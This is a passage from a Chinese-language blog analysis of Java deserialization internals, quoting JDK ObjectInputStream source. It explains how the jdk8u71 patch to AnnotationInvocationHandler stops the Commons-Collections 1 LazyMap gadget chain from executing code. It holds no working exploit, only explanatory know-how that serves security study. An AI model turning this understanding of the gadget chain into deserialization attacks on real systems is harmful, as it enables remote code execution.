和序列化类似，读基础类型，然后递归调用readObject0读复杂类型。所以反序列化可以理解为是从里往外的。
实际上后续的都比较类似了，就是根据读到的标识符来调用对应的方法读取数据。不同的类有不同的处理方式，比如读取动态代理类的时候会调用resolveProxyClass而不是resolveClass

protected Class<?> resolveProxyClass(String[] interfaces)
    throws IOException, ClassNotFoundException
{
    ClassLoader latestLoader = latestUserDefinedLoader();
    ClassLoader nonPublicLoader = null;
    boolean hasNonPublicInterface = false;

    // define proxy in class loader of non-public interface(s), if any
    Class<?>[] classObjs = new Class<?>[interfaces.length];
    for (int i = 0; i < interfaces.length; i++) {
        Class<?> cl = Class.forName(interfaces[i], false, latestLoader);
        if ((cl.getModifiers() & Modifier.PUBLIC) == 0) {
            if (hasNonPublicInterface) {
                if (nonPublicLoader != cl.getClassLoader()) {
                    throw new IllegalAccessError(
                        "conflicting non-public interface class loaders");
                }
            } else {
                nonPublicLoader = cl.getClassLoader();
                hasNonPublicInterface = true;
            }
        }
        classObjs[i] = cl;
    }
    try {
        return Proxy.getProxyClass(
            hasNonPublicInterface ? nonPublicLoader : latestLoader,
            classObjs);
    } catch (IllegalArgumentException e) {
        throw new ClassNotFoundException(null, e);
    }
}

获取到的是一个动态代理类$Proxy0
读完数据后readOrdinaryObject会判断是否定义了readResolve

   if (obj != null &&
        handles.lookupException(passHandle) == null &&
        desc.hasReadResolveMethod())
    {
        Object rep = desc.invokeReadResolve(obj);
        if (unshared && rep.getClass().isArray()) {
            rep = cloneArray(rep);
        }
        if (rep != obj) {
            handles.setObject(passHandle, obj = rep);
        }
    }

    return obj;
}

和writeReplace很像。
调用完readOrdinaryObject后会调用checkResolve

private Object checkResolve(Object obj) throws IOException {
    if (!enableResolve || handles.lookupException(passHandle) != null) {
        return obj;
    }
    Object rep = resolveObject(obj);
    if (rep != obj) {
        handles.setObject(passHandle, rep);
    }
    return rep;
}

和replaceObject功能很类似，如果开启了enableResolve，就会调用resolveObject的结果替换反序列化读到的对象，也就是把前面获取的返回值扔掉换成这个函数的返回值。
最后回到readObject的后半部分，执行完readObject0以后

        ClassNotFoundException ex = handles.lookupException(passHandle);
        if (ex != null) {
            throw ex;
        }
        if (depth == 0) {
            vlist.doCallbacks();
        }
        return obj;
    } finally {
        passHandle = outerHandle;
        if (closed && depth == 0) {
            clear();
        }
    }
}

调用了vlist.doCallbacks

void doCallbacks() throws InvalidObjectException {
    try {
        while (list != null) {
            AccessController.doPrivileged(
                new PrivilegedExceptionAction<Void>()
            {
                public Void run() throws InvalidObjectException {
                    list.obj.validateObject();
                    return null;
                }
            }, list.acc);
            list = list.next;
        }
    } catch (PrivilegedActionException ex) {
        list = null;
        throw (InvalidObjectException) ex.getException();
    }
}

调用了validateObject，如果list.obj重写了这个方法会调用，但一般不会调用。

总结

实际上序列化和反序列化的思路都是比较简单的，就是定义一种协议，通过标识符和数据来储存对象。读取的时候也是一样根据标识符来读取，一直到基础类型为止。
序列化和反序列化的默认过程都是从内到外的，但重写writeObject/readObject可能导致流程变化。
JDK提供了一些方法允许开发者改变序列化和反序列化的流程，序列化的包括writeReplace、replaceObject、annotateClass，反序列化的包括readResolve、resolveObject、resolveClass、readObjectNoData，分析时可以重点关注这些函数。
分析完了发现这个过程里没有Externalizable的，早知道分析rmi那个动态代理好了(

jdk8u71修复

顺便分析下jdk8u71对于cc1的修复，8u71中AnnotationInvocationHandler的readObject改成了这样

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    ObjectInputStream.GetField fields = s.readFields();

    @SuppressWarnings("unchecked")
    Class<? extends Annotation> t = (Class<? extends Annotation>)fields.get("type", null);
    @SuppressWarnings("unchecked")
    Map<String, Object> streamVals = (Map<String, Object>)fields.get("memberValues", null);

    // Check to make sure that types have not evolved incompatibly

也就是用s.readFields代替s.defaultReadObject()

public ObjectInputStream.GetField readFields()
    throws IOException, ClassNotFoundException
{
    SerialCallbackContext ctx = curContext;
    if (ctx == null) {
        throw new NotActiveException("not in call to readObject");
    }
    Object curObj = ctx.getObj();
    ObjectStreamClass curDesc = ctx.getDesc();
    bin.setBlockDataMode(false);
    GetFieldImpl getField = new GetFieldImpl(curDesc);
    getField.readFields();
    bin.setBlockDataMode(true);
    if (!curDesc.hasWriteObjectData()) {
        /*
         * Fix for 4360508: since stream does not contain terminating
         * TC_ENDBLOCKDATA tag, set flag so that reading code elsewhere
         * knows to simulate end-of-custom-data behavior.
         */
        defaultDataEnd = true;
    }

    return getField;
}

调用了GetFieldImpl#readFields

void readFields() throws IOException {
    bin.readFully(primVals, 0, primVals.length, false);

    int oldHandle = passHandle;
    ObjectStreamField[] fields = desc.getFields(false);
    int numPrimFields = fields.length - objVals.length;
    for (int i = 0; i < objVals.length; i++) {
        objVals[i] =
            readObject0(fields[numPrimFields + i].isUnshared());
        objHandles[i] = passHandle;
    }
    passHandle = oldHandle;
}

实际上没什么区别还是会从里到外递归调用readObject0，那么先执行完的是内层的那个AnnotationInvocationHandler，也就是动态代理里面的那个handler对象，看下流程：

Map<String, Object> mv = new LinkedHashMap<>();

// If there are annotation members without values, that
// situation is handled by the invoke method.
for (Map.Entry<String, Object> memberValue : streamVals.entrySet()) {
    String name = memberValue.getKey();
    Object value = null;
    Class<?> memberType = memberTypes.get(name);
    if (memberType != null) {  // i.e. member still exists
        value = memberValue.getValue();
        if (!(memberType.isInstance(value) ||
              value instanceof ExceptionProxy)) {
            value = new AnnotationTypeMismatchExceptionProxy(
                    value.getClass() + "[" + value + "]").setMember(
                        annotationType.members().get(name));
        }
    }
    mv.put(name, value);
}

UnsafeAccessor.setType(this, t);
UnsafeAccessor.setMemberValues(this, mv);

此时memberValues是lazyMap，但实际上获取到lazyMap对象后，这里相当于把这个lazyMap拆开了，只留下了key和value，放到了新的LinkedHashMap里，然后赋值给mamberValues。那么实际上反序列化读出来的这个AnnotationInvocationHandler里面已经没有cc的payload了。
而外层的AnnotationInvocationHandler再调用streamVals.entrySet()时，虽然这个streamVals还是一个动态代理，但里面的AnnotationInvocationHandler里面已经没有lazyMap了，只有一个LinkedHashMap，那再对它调get也就执行不了代码了。
所以主要的修复逻辑就是new的这个LinkedHashMap，和getField没啥关系。

参考链接

https://docs.oracle.com/javase/8/docs/platform/serialization/spec/input.html
https://docs.oracle.com/javase/8/docs/platform/serialization/spec/output.html
https://www.bookstack.cn/read/anbai-inc-javaweb-sec/javase-JavaDeserialization-Serialization.md
https://www.cnblogs.com/binarylei/p/10989372.html